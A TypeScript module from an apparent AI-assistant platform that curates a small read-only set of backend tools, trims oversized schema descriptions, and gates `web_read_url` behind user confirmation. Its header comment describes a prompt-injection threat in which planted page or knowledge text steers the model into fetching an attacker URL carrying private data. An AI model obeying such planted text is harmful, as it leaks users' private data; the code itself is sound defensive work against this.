/**
 * Curated Backend Tools
 *
 * `/chat/tools` (via @neuro/chat-adapter's `createBackendTools`) returns
 * every tool registered by every plugin on the platform — 2000+ of them,
 * including every micro-plugin action (eBay listings, hardware DRC
 * checks, etc). Sending that many tool schemas in one inference request
 * exceeds what any LLM tool-calling API accepts and the model-router
 * rejects the call outright.
 *
 * @neuro/chat-adapter has no server-side or client-side filtering hook
 * for this today, so we fetch the full list ourselves and keep only a
 * small, generically-useful, read-only allowlist. Mutating tools
 * (`action_create_entity` etc.) are deliberately excluded: `/chat/tools`
 * does send each tool's `safetyLevel`, but the adapter's bridge drops it,
 * so a backend tool merged in here runs with the default 'read' capability
 * — without a confirmation prompt (and the backend refuses destructive ones
 * without `confirmed: true`, which the bridge never sends). Mutating
 * actions go through `ui_run_action`, which is confirmed by construction
 * (see ui-action-tools.ts).
 *
 * `web_read_url` is the exception that gets a prompt: the model sees page
 * text and the user's private knowledge results, so text planted in either
 * could steer it into fetching `https://attacker/?d=<private data>`. A URL
 * the user wrote themselves (or that a page handed over with
 * `neuro:assistant:ask`, which is sent as the user's message) runs without
 * asking — see `urlMentionedByUser` and AssistantOverlayHost's
 * onToolConfirmation.
 *
 * The `knowledge_*` tools' descriptions and parameter schemas each embed
 * a redundant, exhaustive enumeration of every entity type registered by
 * every plugin (~9KB apiece, in *both* the top-level description and the
 * `entityType` parameter's own description) — found by reading the raw
 * request the backend received for a genuinely simple 3-message
 * conversation and seeing `prompt_tokens: 17743`. That volume alone was
 * enough to push requests into a "large/agentic" routing classification
 * that a GPU node (`gpu5080`) rejected with a 400, forcing a fallback to
 * a cloud route with unreliable tool-calling behavior. Trimming these
 * schemas is safe: the schema is only what the *model* is told up front —
 * execution still happens entirely server-side via the same
 * ToolRegistryService regardless of what we describe here, so a shorter
 * description doesn't change what the tool can do, only how much of the
 * entity-type list the model sees verbatim (it can still supply any
 * entity type as free text).
 */

import { createBackendTools } from '@neuro/chat-adapter';
import type { BackendToolApiClient, SafeToolDefinition, ToolDefinition } from '@neuro/chat-adapter';

/** Backend tools that ask before running (see the module doc). */
export const CONFIRMED_BACKEND_TOOLS = new Set(['web_read_url']);
const ASK_FIRST: Pick<SafeToolDefinition, 'requiredCapabilities' | 'requiresConfirmation'> = {
  requiredCapabilities: ['network'],
  requiresConfirmation: true,
};

/**
 * Whether `url` appears verbatim in something the user wrote — then fetching
 * it is what they asked for, not something injected text made up.
 */
export function urlMentionedByUser(url: unknown, userTexts: readonly string[]): boolean {
  if (typeof url !== 'string') return false;
  const wanted = url.trim();
  if (!/^https?:\/\//i.test(wanted)) return false;
  return userTexts.some((text) => text.includes(wanted));
}

const CURATED_TOOL_NAMES = new Set([
  'get_current_time',
  'knowledge_search',
  'knowledge_list_entities',
  'knowledge_get_entity',
  'knowledge_get_summary',
  'rag_search',
  // Web Search plugin (read-only, public web only): "Ask Neuro about this
  // page" needs to read the whole page, not just what's on screen.
  'web_search',
  'web_read_url',
]);

/** Descriptions longer than this get truncated — generous enough for any
 * normal tool description, well short of the ~9KB entity-type dumps. */
const MAX_DESCRIPTION_LENGTH = 400;

function truncate(text: string): string {
  return text.length > MAX_DESCRIPTION_LENGTH
    ? `${text.slice(0, MAX_DESCRIPTION_LENGTH)}…`
    : text;
}

/** Recursively truncates any "description" string found anywhere in a
 * JSON Schema object (top-level and nested under properties/items/etc). */
function trimSchemaDescriptions(value: unknown): unknown {
  if (Array.isArray(value)) {
    return value.map(trimSchemaDescriptions);
  }
  if (value && typeof value === 'object') {
    const entries = Object.entries(value as Record<string, unknown>).map(([key, val]) => {
      if (key === 'description' && typeof val === 'string') {
        return [key, truncate(val)];
      }
      return [key, trimSchemaDescriptions(val)];
    });
    return Object.fromEntries(entries);
  }
  return value;
}

function trimTool(tool: ToolDefinition): SafeToolDefinition {
  return {
    ...tool,
    description: tool.description ? truncate(tool.description) : tool.description,
    schema: trimSchemaDescriptions(tool.schema) as Record<string, unknown>,
    ...(CONFIRMED_BACKEND_TOOLS.has(tool.name) ? ASK_FIRST : {}),
  };
}

export async function loadCuratedBackendTools(api: BackendToolApiClient): Promise<SafeToolDefinition[]> {
  try {
    const allTools = await createBackendTools(api);
    return allTools.filter((t) => CURATED_TOOL_NAMES.has(t.name)).map(trimTool);
  } catch (err) {
    console.warn('[AssistantOverlay] Failed to load curated backend tools:', err);
    return [];
  }
}
